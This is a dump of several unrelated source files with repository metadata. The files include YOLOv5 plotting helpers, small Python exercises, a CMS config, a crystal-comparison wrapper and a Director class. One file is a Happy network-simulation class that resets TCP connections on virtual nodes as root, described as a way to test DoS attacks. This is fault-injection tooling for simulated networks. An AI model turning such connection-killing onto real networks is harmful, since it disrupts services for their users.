options["quiet"] = False
options["node_id"] = None
options["action"] = None
options["interface"] = None
options["start"] = None
options["duration"] = None
options["ips"] = None
options["dstPort"] = None
def option():
return options.copy()
class HappyNodeTcpReset(HappyNode):
"""
Provides tcpkill functionality to virtual nodes. Use this to test DoS attacks on a
Happy network by blocking TCP connections to specific nodes, interfaces, and ports.
happy-node-tcp-reset [-h --help] [-q --quiet] [-i --id <NODE_NAME>] [--interface <IFACE>]
[-s --start <START_TIME>] [-d --duration <DURATION>] [--ips <SOURCE_IP,DEST_IP>]
[--dstPort <DEST_PORT>]
-i --id Required. Target node to block connections for. Find using
happy-node-list or happy-state.
--interface Target node interface to block connections for.
-s --start Time to initiate TCP block, in seconds from NOW
-d --duration Time to maintain TCP block, in seconds from <START_TIME>
--ips Source and destination IPs to block connections for.
--dstPort Destination port to block connections for.
Example:
$ happy-node-tcp-reset --id BorderRouter --interface wlan0 --start 2 --duration 20 --dstPort 11095
Kills the TCP connection for the BorderRouter node's wlan0 interface for 18 seconds.
return:
0 success
1 fail
"""
def __init__(self, opts=options):
HappyNode.__init__(self)
self.quiet = opts["quiet"]
self.node_id = opts["node_id"]
self.action = opts["action"]
self.interface = opts["interface"]
self.begin = opts["start"]
self.duration = opts["duration"]
self.ips = opts["ips"]
self.dstPort = opts["dstPort"]
def __pre_check(self):
# Check if the name of the node is given
if not self.node_id:
emsg = "Missing name of the virtual node that should join a network."
self.logger.error("[localhost] HappyNodeJoin: %s" % (emsg))
self.exit()
# Check if node exists
if not self._nodeExists():
emsg = "virtual node %s does not exist." % (self.node_id)
self.logger.error("[%s] HappyNodeJoin: %s" % (self.node_id, emsg))
self.exit()
def start_process(self, node_id, cmd, tag, quiet=None, strace=True):
emsg = "start_weave_process %s at %s node." % (tag, node_id)
self.logger.debug("[%s] process: %s" % (node_id, emsg))
options = happy.HappyProcessStart.option()
options["quiet"] = self.quiet
options["node_id"] = node_id
options["tag"] = tag
options["command"] = cmd
options["strace"] = True
proc = happy.HappyProcessStart.HappyProcessStart(options)
proc.run()
def __TcpResetConnection(self):
path = os.path.dirname(os.path.abspath(__file__))
cmd = "python " + path + "/HappyPacketProcess.py --interface %s --start %d --duration %d --action RESET " % \
(self.interface, self.begin, self.duration)
if self.ips is not None:
cmd += " --ips %s" % self.ips
if self.dstPort is not None:
cmd += " --dstPort %d" % self.dstPort
if self.quiet is True:
cmd += " --quiet"
cmd = self.runAsRoot(cmd)
self.start_process(node_id=self.node_id, cmd=cmd, tag="TcpReset")
def run(self):
self.__pre_check()
self.__TcpResetConnection()
return ReturnMsg(0)
| [
"rszewczyk@nestlabs.com"
] | rszewczyk@nestlabs.com |
b861a7633f17530727400e1200fced3dfdc1d7a0 | aae19ea6e93d753ce07562be7089703131d4c6d9 | /数据结构与算法/sortDict.py | 66a9fed94610b85c0e88f4b67efebf3200f44c16 | [] | no_license | Billpzoom/pythoncookbook | e4d85029826b57fd1b9506619be7420470731685 | ae021c3b5551d74fb0190a037eeed249800ece12 | refs/heads/master | 2022-11-17T21:17:03.441668 | 2020-07-24T06:35:08 | 2020-07-24T06:35:08 | 281,885,066 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 412 | py | rows = [
{'fname': 'Brian', 'lname': 'Jones', 'uid': 1003},
{'fname': 'David', 'lname': 'Beazley', 'uid': 1002},
{'fname': 'John', 'lname': 'Cleese', 'uid': 1001},
{'fname': 'Big', 'lname': 'Jones', 'uid': 1004}
]
from operator import itemgetter
rows_by_fname = sorted(rows, key=itemgetter('fname'))
rows_by_uid = sorted(rows,key=itemgetter('uid'))
print(rows_by_fname)
print(rows_by_uid) | [
"douzi0530@hotmail.com"
] | douzi0530@hotmail.com |
f4300b864a90d338308ffb2435af16c9b3283b39 | aee573c81dc297a97772b99cd90e05d494b25f77 | /learnpython/demo_ordinal_numbers.py | e89ba6bf760a49d3b327e40ef6923fe0ef782361 | [] | no_license | YuxuanSu-Sean/learning | 6df9d7b348e3f6c8cad0347e222c1ed244c92332 | 1356b85c2b673925f1fc89ff45f54fb499d342d0 | refs/heads/master | 2022-11-13T14:08:17.808037 | 2022-11-10T05:15:16 | 2022-11-10T05:15:16 | 204,625,964 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 291 | py | # 序数练习
numbers = list(range(1,10))
print(numbers)
for number in numbers:
if number == 1:
print(str(number) + "st")
elif number == 2:
print(str(number) + "nd")
elif number == 3:
print(str(number) + "rd")
else:
print(str(number) + "th") | [
"497572121@qq.com"
] | 497572121@qq.com |
f135199afee7f107d21a2bfe38d95e98e0ca3a85 | 81539aba88c22cf75bd2e14f5e0e92f2bf54e962 | /DarkMatterMap2017/TTbarDMJets_Dilepton_pseudoscalar_LO_TuneCP5_13TeV_madgraph_mcatnlo_pythia8/TTbarDMJets_Dilepton_pseudoscalar_LO_Mchi-1_Mphi-250_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/TTbarDMJets_Dilepton_pseudoscalar_LO_TuneCP5_13TeV_madgraph_mcatnlo_pythia8_260000_2_cff.py | 2cc85603244e7765849bf89b190cab40e038ff29 | [] | no_license | nistefan/RandomizedParametersSeparator | ad35b48b95e9745814c0bf9d8d8b6eb8aa479177 | 66a0e291b59113c6b5301768f1c10e36cf23d3c3 | refs/heads/master | 2021-01-03T00:41:17.415005 | 2020-02-19T13:30:54 | 2020-02-19T13:30:54 | 239,838,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,893 | py | import FWCore.ParameterSet.Config as cms
maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
readFiles = cms.untracked.vstring()
source = cms.Source ("PoolSource",fileNames = readFiles, lumisToProcess = cms.untracked.VLuminosityBlockRange(*('1:34673', '1:12127', '1:12785', '1:18734', '1:18816', '1:18193', '1:18352', '1:20878', '1:12449', '1:15269', '1:18521', '1:18538', '1:20793', '1:20820', '1:20840', '1:31324', '1:2919', '1:164', '1:26131', '1:26211', '1:29806', '1:9094', '1:9610', '1:27433', '1:25956', '1:27969', '1:25475', '1:25629', '1:25657', '1:25468', '1:25946', '1:25158', '1:27629', '1:30854', '1:30763', '1:26034', '1:6561', '1:8139', '1:26354', '1:33508', ))
)
readFiles.extend( ['/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Dilepton_pseudoscalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/260000/569B4D10-211C-EA11-A715-FA163E37F419.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Dilepton_pseudoscalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/260000/30550AAC-B81A-EA11-BAC1-0CC47A5FC2A1.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Dilepton_pseudoscalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/260000/2E4A544D-FB1C-EA11-976A-AC1F6BAC7C10.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Dilepton_pseudoscalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/260000/60FE314E-FF17-EA11-BF96-0025905C53A6.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Dilepton_pseudoscalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/260000/7461BAF6-B81A-EA11-B8C8-0242AC1C0502.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Dilepton_pseudoscalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/260000/281F6DB4-B81A-EA11-ABBF-FA163EB32F6D.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Dilepton_pseudoscalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/260000/68FB54A5-D319-EA11-9BF2-0CC47A2AED8A.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Dilepton_pseudoscalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/260000/D4CB8FB4-D419-EA11-8898-E0071B6C9DF0.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Dilepton_pseudoscalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/260000/44A61A10-EA1E-EA11-B484-AC1F6B1AF194.root', 
'/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Dilepton_pseudoscalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/260000/74DE8B80-0B18-EA11-9093-3CFDFE63F840.root']); | [
"Nicole.Stefanov@cern.ch"
] | Nicole.Stefanov@cern.ch |
76940cff3904834ea315fb5a14390903b58323f3 | 2943da112999b225beb79eedcf1c5b450c7674f6 | /powercell_model/YOLOv5_Trained_Model/utils/plots.py | b6cb104359b06ee37351dad61106c2ecf9468b63 | [] | no_license | cavineers/Vision2021 | b2723d8575bf4a6d11b4047e418c7ae8781c5553 | 428f238ababd2f46bf0f1520588b62ac332c5e57 | refs/heads/main | 2023-03-14T18:51:33.163852 | 2021-03-27T19:01:23 | 2021-03-27T19:01:23 | 331,004,551 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 15,999 | py | # Plotting utils
import glob
import os
import random
import asyncio
from copy import copy
from pathlib import Path
import cv2
import math
from math import atan2, degrees
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import torch
import yaml
from PIL import Image, ImageDraw
from scipy.signal import butter, filtfilt
from utils.general import xywh2xyxy, xyxy2xywh
from utils.metrics import fitness
from encodings import undefined
# Settings
matplotlib.rc('font', **{'size': 11})
matplotlib.use('Agg') # for writing to files only
def color_list():
# Return first 10 plt colors as (r,g,b) https://stackoverflow.com/questions/51350872/python-from-color-name-to-rgb
def hex2rgb(h):
return tuple(int(h[1 + i:1 + i + 2], 16) for i in (0, 2, 4))
return [hex2rgb(h) for h in plt.rcParams['axes.prop_cycle'].by_key()['color']]
def hist2d(x, y, n=100):
# 2d histogram used in labels.png and evolve.png
xedges, yedges = np.linspace(x.min(), x.max(), n), np.linspace(y.min(), y.max(), n)
hist, xedges, yedges = np.histogram2d(x, y, (xedges, yedges))
xidx = np.clip(np.digitize(x, xedges) - 1, 0, hist.shape[0] - 1)
yidx = np.clip(np.digitize(y, yedges) - 1, 0, hist.shape[1] - 1)
return np.log(hist[xidx, yidx])
def butter_lowpass_filtfilt(data, cutoff=1500, fs=50000, order=5):
# https://stackoverflow.com/questions/28536191/how-to-filter-smooth-with-scipy-numpy
def butter_lowpass(cutoff, fs, order):
nyq = 0.5 * fs
normal_cutoff = cutoff / nyq
return butter(order, normal_cutoff, btype='low', analog=False)
b, a = butter_lowpass(cutoff, fs, order=order)
return filtfilt(b, a, data) # forward-backward filter
def plot_one_box(x, img, color=None, label=None, line_thickness=None):
# Plots one bounding box on image img
tl = line_thickness or round(0.002 * (img.shape[0] + img.shape[1]) / 2) + 1 # line/font thickness
color = color or [random.randint(0, 255) for _ in range(3)]
c1, c2 = (int(x[0]), int(x[1])), (int(x[2]), int(x[3])) # x[0] = left line; x[1] = top line; x[2] = right line; x[3] = bottom line;
width = int(x[2]) - int(x[0])
height = int(x[3]) - int(x[1])
cv2.circle(img, (int(1920 / 2), int(1080 / 2)), 10, [255,255,255], -1)
cv2.circle(img, (int(x[2]) + int(-width / 2),int(x[3]) + int(-height / 2)), 10, [0,0,255], -1)
cv2.rectangle(img, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA)
if label:
print(label)
tf = max(tl - 1, 1) # font thickness
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3
cv2.rectangle(img, c1, c2, color, -1, cv2.LINE_AA) # filled
cv2.putText(img, label, (c1[0], c1[1] - 2), 0, tl / 3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)
def plot_wh_methods(): # from utils.plots import *; plot_wh_methods()
# Compares the two methods for width-height anchor multiplication
# https://github.com/ultralytics/yolov3/issues/168
x = np.arange(-4.0, 4.0, .1)
ya = np.exp(x)
yb = torch.sigmoid(torch.from_numpy(x)).numpy() * 2
fig = plt.figure(figsize=(6, 3), dpi=150)
plt.plot(x, ya, '.-', label='YOLOv3')
plt.plot(x, yb ** 2, '.-', label='YOLOv5 ^2')
plt.plot(x, yb ** 1.6, '.-', label='YOLOv5 ^1.6')
plt.xlim(left=-4, right=4)
plt.ylim(bottom=0, top=6)
plt.xlabel('input')
plt.ylabel('output')
plt.grid()
plt.legend()
fig.tight_layout()
fig.savefig('comparison.png', dpi=200)
def output_to_target(output):
# Convert model output to target format [batch_id, class_id, x, y, w, h, conf]
targets = []
for i, o in enumerate(output):
for *box, conf, cls in o.cpu().numpy():
targets.append([i, cls, *list(*xyxy2xywh(np.array(box)[None])), conf])
return np.array(targets)
def plot_images(images, targets, paths=None, fname='images.jpg', names=None, max_size=640, max_subplots=16):
# Plot image grid with labels
if isinstance(images, torch.Tensor):
images = images.cpu().float().numpy()
if isinstance(targets, torch.Tensor):
targets = targets.cpu().numpy()
# un-normalise
if np.max(images[0]) <= 1:
images *= 255
tl = 3 # line thickness
tf = max(tl - 1, 1) # font thickness
bs, _, h, w = images.shape # batch size, _, height, width
bs = min(bs, max_subplots) # limit plot images
ns = np.ceil(bs ** 0.5) # number of subplots (square)
# Check if we should resize
scale_factor = max_size / max(h, w)
if scale_factor < 1:
h = math.ceil(scale_factor * h)
w = math.ceil(scale_factor * w)
colors = color_list() # list of colors
mosaic = np.full((int(ns * h), int(ns * w), 3), 255, dtype=np.uint8) # init
for i, img in enumerate(images):
if i == max_subplots: # if last batch has fewer images than we expect
break
block_x = int(w * (i // ns))
block_y = int(h * (i % ns))
img = img.transpose(1, 2, 0)
if scale_factor < 1:
img = cv2.resize(img, (w, h))
mosaic[block_y:block_y + h, block_x:block_x + w, :] = img
if len(targets) > 0:
image_targets = targets[targets[:, 0] == i]
boxes = xywh2xyxy(image_targets[:, 2:6]).T
classes = image_targets[:, 1].astype('int')
labels = image_targets.shape[1] == 6 # labels if no conf column
conf = None if labels else image_targets[:, 6] # check for confidence presence (label vs pred)
if boxes.shape[1] and boxes.max() <= 1: # if normalized
boxes[[0, 2]] *= w # scale to pixels
boxes[[1, 3]] *= h
boxes[[0, 2]] += block_x
boxes[[1, 3]] += block_y
for j, box in enumerate(boxes.T):
cls = int(classes[j])
color = colors[cls % len(colors)]
cls = names[cls] if names else cls
if labels or conf[j] > 0.25: # 0.25 conf thresh
label = '%s' % cls if labels else '%s %.1f' % (cls, conf[j])
plot_one_box(box, mosaic, label=label, color=color, line_thickness=tl)
# Draw image filename labels
if paths:
label = Path(paths[i]).name[:40] # trim to 40 char
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
cv2.putText(mosaic, label, (block_x + 5, block_y + t_size[1] + 5), 0, tl / 3, [220, 220, 220], thickness=tf,
lineType=cv2.LINE_AA)
# Image border
cv2.rectangle(mosaic, (block_x, block_y), (block_x + w, block_y + h), (255, 255, 255), thickness=3)
if fname:
r = min(1280. / max(h, w) / ns, 1.0) # ratio to limit image size
mosaic = cv2.resize(mosaic, (int(ns * w * r), int(ns * h * r)), interpolation=cv2.INTER_AREA)
# cv2.imwrite(fname, cv2.cvtColor(mosaic, cv2.COLOR_BGR2RGB)) # cv2 save
Image.fromarray(mosaic).save(fname) # PIL save
return mosaic
def plot_lr_scheduler(optimizer, scheduler, epochs=300, save_dir=''):
    """Simulate `epochs` scheduler steps on copies of the inputs and save the LR curve.

    Writes <save_dir>/LR.png; the caller's optimizer/scheduler are not modified.
    """
    # Work on copies so stepping the schedule does not disturb real training state.
    opt_sim, sched_sim = copy(optimizer), copy(scheduler)
    lrs = []
    for _ in range(epochs):
        sched_sim.step()
        lrs.append(opt_sim.param_groups[0]['lr'])
    plt.plot(lrs, '.-', label='LR')
    plt.xlabel('epoch')
    plt.ylabel('LR')
    plt.grid()
    plt.xlim(0, epochs)
    plt.ylim(0)
    plt.tight_layout()
    plt.savefig(Path(save_dir) / 'LR.png', dpi=200)
def plot_test_txt():  # from utils.plots import *; plot_test()
    """Plot 2-D and per-axis histograms of box centres loaded from test.txt."""
    detections = np.loadtxt('test.txt', dtype=np.float32)
    centres = xyxy2xywh(detections[:, :4])
    xs, ys = centres[:, 0], centres[:, 1]

    # Joint 2-D histogram of the centre points.
    fig, axis = plt.subplots(1, 1, figsize=(6, 6), tight_layout=True)
    axis.hist2d(xs, ys, bins=600, cmax=10, cmin=0)
    axis.set_aspect('equal')
    plt.savefig('hist2d.png', dpi=300)

    # Marginal 1-D histograms, one per axis.
    fig, axes = plt.subplots(1, 2, figsize=(12, 6), tight_layout=True)
    axes[0].hist(xs, bins=600)
    axes[1].hist(ys, bins=600)
    plt.savefig('hist1d.png', dpi=200)
def plot_targets_txt():  # from utils.plots import *; plot_targets_txt()
    """Plot one histogram per targets.txt column (x, y, width, height)."""
    data = np.loadtxt('targets.txt', dtype=np.float32).T
    titles = ['x targets', 'y targets', 'width targets', 'height targets']
    fig, axes = plt.subplots(2, 2, figsize=(8, 8), tight_layout=True)
    axes = axes.ravel()
    for axis, column, title in zip(axes, data, titles):
        # Legend shows mean +/- std of the component.
        axis.hist(column, bins=100, label='%.3g +/- %.3g' % (column.mean(), column.std()))
        axis.legend()
        axis.set_title(title)
    plt.savefig('targets.jpg', dpi=200)
def plot_study_txt(path='', x=None): # from utils.plots import *; plot_study_txt()
# Plot study.txt generated by test.py
# Compares P/R/mAP/latency columns of study_coco_<model>.txt for the four yolov5
# sizes, plus a hard-coded EfficientDet reference curve on the trade-off axes (ax2).
fig, ax = plt.subplots(2, 4, figsize=(10, 6), tight_layout=True)
ax = ax.ravel()
fig2, ax2 = plt.subplots(1, 1, figsize=(8, 4), tight_layout=True)
for f in [Path(path) / f'study_coco_{x}.txt' for x in ['yolov5s', 'yolov5m', 'yolov5l', 'yolov5x']]:
# Columns selected match the `s` labels below (metrics + timing).
y = np.loadtxt(f, dtype=np.float32, usecols=[0, 1, 2, 3, 7, 8, 9], ndmin=2).T
x = np.arange(y.shape[1]) if x is None else np.array(x)
s = ['P', 'R', 'mAP@.5', 'mAP@.5:.95', 't_inference (ms/img)', 't_NMS (ms/img)', 't_total (ms/img)']
for i in range(7):
ax[i].plot(x, y[i], '.-', linewidth=2, markersize=8)
ax[i].set_title(s[i])
# Speed/accuracy trade-off: plot up to (and including) the best-mAP point.
j = y[3].argmax() + 1
ax2.plot(y[6, :j], y[3, :j] * 1E2, '.-', linewidth=2, markersize=8,
label=f.stem.replace('study_coco_', '').replace('yolo', 'YOLO'))
ax2.plot(1E3 / np.array([209, 140, 97, 58, 35, 18]), [34.6, 40.5, 43.0, 47.5, 49.7, 51.5],
'k.-', linewidth=2, markersize=8, alpha=.25, label='EfficientDet')
ax2.grid()
ax2.set_xlim(0, 30)
ax2.set_ylim(28, 50)
ax2.set_yticks(np.arange(30, 55, 5))
ax2.set_xlabel('GPU Speed (ms/img)')
ax2.set_ylabel('COCO AP val')
ax2.legend(loc='lower right')
plt.savefig('test_study.png', dpi=300)
def plot_labels(labels, save_dir=''):
# plot dataset labels
# NOTE(review): mutates `labels` in place further down (rectangle section) —
# callers should pass a copy if they reuse the array afterwards.
c, b = labels[:, 0], labels[:, 1:].transpose() # classes, boxes
nc = int(c.max() + 1) # number of classes
colors = color_list()
# seaborn correlogram (best effort: silently skipped if seaborn/pandas missing)
try:
import seaborn as sns
import pandas as pd
x = pd.DataFrame(b.transpose(), columns=['x', 'y', 'width', 'height'])
sns.pairplot(x, corner=True, diag_kind='hist', kind='scatter', markers='o',
plot_kws=dict(s=3, edgecolor=None, linewidth=1, alpha=0.02),
diag_kws=dict(bins=50))
plt.savefig(Path(save_dir) / 'labels_correlogram.png', dpi=200)
plt.close()
except Exception as e:
pass
# matplotlib labels
ax = plt.subplots(2, 2, figsize=(8, 8), tight_layout=True)[1].ravel()
ax[0].hist(c, bins=np.linspace(0, nc, nc + 1) - 0.5, rwidth=0.8)
ax[0].set_xlabel('classes')
ax[2].scatter(b[0], b[1], c=hist2d(b[0], b[1], 90), cmap='jet')
ax[2].set_xlabel('x')
ax[2].set_ylabel('y')
ax[3].scatter(b[2], b[3], c=hist2d(b[2], b[3], 90), cmap='jet')
ax[3].set_xlabel('width')
ax[3].set_ylabel('height')
# rectangles: draw first 1000 boxes centred on a white 2000x2000 canvas
labels[:, 1:3] = 0.5 # center
labels[:, 1:] = xywh2xyxy(labels[:, 1:]) * 2000
img = Image.fromarray(np.ones((2000, 2000, 3), dtype=np.uint8) * 255)
for cls, *box in labels[:1000]:
ImageDraw.Draw(img).rectangle(box, width=1, outline=colors[int(cls) % 10]) # plot
ax[1].imshow(img)
ax[1].axis('off')
# hide subplot frames
for a in [0, 1, 2, 3]:
for s in ['top', 'right', 'left', 'bottom']:
ax[a].spines[s].set_visible(False)
plt.savefig(Path(save_dir) / 'labels.png', dpi=200)
plt.close()
def plot_evolution(yaml_file='data/hyp.finetune.yaml'): # from utils.plots import *; plot_evolution()
# Plot hyperparameter evolution results in evolve.txt
# One scatter subplot per hyperparameter in `yaml_file`, coloured by 2-D density;
# the best single result (max fitness) is marked with a black '+'.
with open(yaml_file) as f:
hyp = yaml.load(f, Loader=yaml.FullLoader)
x = np.loadtxt('evolve.txt', ndmin=2)
f = fitness(x)
# weights = (f - f.min()) ** 2 # for weighted results
plt.figure(figsize=(10, 12), tight_layout=True)
matplotlib.rc('font', **{'size': 8})
for i, (k, v) in enumerate(hyp.items()):
# Hyperparameter columns start at offset 7 in evolve.txt rows.
y = x[:, i + 7]
# mu = (y * weights).sum() / weights.sum() # best weighted result
mu = y[f.argmax()] # best single result
plt.subplot(6, 5, i + 1)
plt.scatter(y, f, c=hist2d(y, f, 20), cmap='viridis', alpha=.8, edgecolors='none')
plt.plot(mu, f.max(), 'k+', markersize=15)
plt.title('%s = %.3g' % (k, mu), fontdict={'size': 9}) # limit to 40 characters
if i % 5 != 0:
plt.yticks([])
print('%15s: %.3g' % (k, mu))
plt.savefig('evolve.png', dpi=200)
print('\nPlot saved as evolve.png')
def plot_results_overlay(start=0, stop=0): # from utils.plots import *; plot_results_overlay()
# Plot training 'results*.txt', overlaying train and val losses
# Produces one 5-panel PNG per results file; panel i overlays series i (train)
# and i+5 (val) from the selected columns.
s = ['train', 'train', 'train', 'Precision', 'mAP@0.5', 'val', 'val', 'val', 'Recall', 'mAP@0.5:0.95'] # legends
t = ['Box', 'Objectness', 'Classification', 'P-R', 'mAP-F1'] # titles
for f in sorted(glob.glob('results*.txt') + glob.glob('../../Downloads/results*.txt')):
results = np.loadtxt(f, usecols=[2, 3, 4, 8, 9, 12, 13, 14, 10, 11], ndmin=2).T
n = results.shape[1] # number of rows
# stop == 0 means "plot to the end".
x = range(start, min(stop, n) if stop else n)
fig, ax = plt.subplots(1, 5, figsize=(14, 3.5), tight_layout=True)
ax = ax.ravel()
for i in range(5):
for j in [i, i + 5]:
y = results[j, x]
ax[i].plot(x, y, marker='.', label=s[j])
# y_smooth = butter_lowpass_filtfilt(y)
# ax[i].plot(x, np.gradient(y_smooth), marker='.', label=s[j])
ax[i].set_title(t[i])
ax[i].legend()
ax[i].set_ylabel(f) if i == 0 else None # add filename
fig.savefig(f.replace('.txt', '.png'), dpi=200)
def plot_results(start=0, stop=0, bucket='', id=(), labels=(), save_dir=''):
# Plot training 'results*.txt'. from utils.plots import *; plot_results(save_dir='runs/train/exp')
# If `bucket` is given, results files are first fetched from GCS via gsutil;
# otherwise all results*.txt under save_dir are plotted into one 10-panel figure.
fig, ax = plt.subplots(2, 5, figsize=(12, 6))
ax = ax.ravel()
s = ['Box', 'Objectness', 'Classification', 'Precision', 'Recall',
'val Box', 'val Objectness', 'val Classification', 'mAP@0.5', 'mAP@0.5:0.95']
if bucket:
# files = ['https://storage.googleapis.com/%s/results%g.txt' % (bucket, x) for x in id]
files = ['results%g.txt' % x for x in id]
c = ('gsutil cp ' + '%s ' * len(files) + '.') % tuple('gs://%s/results%g.txt' % (bucket, x) for x in id)
os.system(c)
else:
files = list(Path(save_dir).glob('results*.txt'))
assert len(files), 'No results.txt files found in %s, nothing to plot.' % os.path.abspath(save_dir)
for fi, f in enumerate(files):
# Per-file parse errors are reported but do not abort the other files.
try:
results = np.loadtxt(f, usecols=[2, 3, 4, 8, 9, 12, 13, 14, 10, 11], ndmin=2).T
n = results.shape[1] # number of rows
x = range(start, min(stop, n) if stop else n)
for i in range(10):
y = results[i, x]
if i in [0, 1, 2, 5, 6, 7]:
y[y == 0] = np.nan # don't show zero loss values
# y /= y[0] # normalize
label = labels[fi] if len(labels) else f.stem
ax[i].plot(x, y, marker='.', label=label, linewidth=2, markersize=8)
ax[i].set_title(s[i])
# if i in [5, 6, 7]: # share train and val loss y axes
# ax[i].get_shared_y_axes().join(ax[i], ax[i - 5])
except Exception as e:
print('Warning: Plotting error for %s; %s' % (f, e))
fig.tight_layout()
ax[1].legend()
fig.savefig(Path(save_dir) / 'results.png', dpi=200)
| [
"rbcrusher88@gmail.com"
] | rbcrusher88@gmail.com |
8be0c13f568672f1cfab78e12f0686636882f2eb | 88abb6486b37bb413152a4feea308249d3a0c250 | /pyxtalcomp/xtalcomp_ase_atoms.py | e3154c39a423cc188a07bdac511c9343979c78f9 | [] | no_license | davidkleiven/PyXTalComp | ca81b1654c6108bfd37005b67e2d3974443c83a9 | a82128edb079baf7d846d9094bd5f5f6f8258fcc | refs/heads/master | 2021-06-05T20:03:22.187463 | 2018-12-08T12:06:51 | 2018-12-08T12:06:51 | 135,704,484 | 0 | 1 | null | 2020-09-18T09:53:57 | 2018-06-01T10:30:54 | C++ | UTF-8 | Python | false | false | 658 | py | from pyxtalcomp_cpp import compare_xtalcomp
class XtalCompASE(object):
    """Callable wrapper around the XtalComp backend for comparing ASE Atoms."""

    def __init__(self):
        pass

    def __call__(self, atom1, atom2, cart_tol=0.05, angle_tol=0.5, reduce_cell=False):
        """Compare two ASE atoms"""
        frac1, species1, lattice1 = self._unpack(atom1)
        frac2, species2, lattice2 = self._unpack(atom2)
        return compare_xtalcomp(frac1, species1, lattice1,
                                frac2, species2, lattice2,
                                cart_tol, angle_tol, reduce_cell)

    @staticmethod
    def _unpack(atoms):
        # Fractional positions, chemical symbols, and the cell matrix of an Atoms object.
        return (atoms.get_scaled_positions(),
                [atom.symbol for atom in atoms],
                atoms.get_cell())
| [
"david.kleiven@ntnu.no"
] | david.kleiven@ntnu.no |
cc88115e578eddbca428099c5e90c28ab4847a19 | 3f93a0c460ab63d6723103ec7bc7bc125612ebd2 | /plugin/gestureLogic/__init__.py | b8219e39c0bce95c10497c8c06a050525d91c1c5 | [] | no_license | umlfri-old/addon_gestures | 88eb85473739b719e8f93b894c395a208594c3a4 | 3d85b8a7c463e1ca06c1e9048aa41482d74f5c78 | refs/heads/master | 2021-01-20T16:35:41.118668 | 2011-03-20T19:28:53 | 2011-03-20T19:28:53 | 90,841,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 343 | py | from GestureManager import CGestureManager
from BoundaryAlgorithm import CBoundaryAlgorithm
from GestureAlgorithm import CGestureAlgorithm
from Gesture import CGesture
from GestureSet import CGestureSet
from BoundaryGestureSet import CBoundaryGestureSet
from Description import CDescription
from BoundaryDescription import CBoundaryDescription | [
"pasikavec@gmail.com"
] | pasikavec@gmail.com |
c30bbbd1ae28a9ed226b15e3271a86f48540e282 | 709d626f7ee134756a1db1ca4c3c94e9049b7e6d | /moviewebsite/domainmodel/director.py | 09e481fe419fea2cce52628b981ea38b7e2484ca | [] | no_license | amieldelatorre/MovieWebsite | f0b0ed4362c84902d26d74a8bb341228a614deb8 | f4171ee9d6be6409ac688a904fea65b414875125 | refs/heads/main | 2023-02-04T13:39:28.628131 | 2020-12-24T02:28:42 | 2020-12-24T02:28:42 | 318,486,567 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 714 | py | class Director:
def __init__(self, full_name: str):
    """Store the director's stripped name, or None for empty/non-string input."""
    if full_name == "" or type(full_name) is not str:
        self.__full_name = None
    else:
        self.__full_name = full_name.strip()

@property
def full_name(self) -> str:
    # The validated name (None when construction input was rejected).
    return self.__full_name

def __repr__(self):
    return f"<Director {self.__full_name}>"

def __eq__(self, other):
    # Directors are equal exactly when their stored names match.
    return self.__full_name == other.__full_name

def __lt__(self, other):
    # Alphabetical ordering on the stored name.
    return self.__full_name < other.__full_name

def __hash__(self):
    return hash(self.__full_name)
| [
"amieljames.delatorre@gmail.com"
] | amieljames.delatorre@gmail.com |
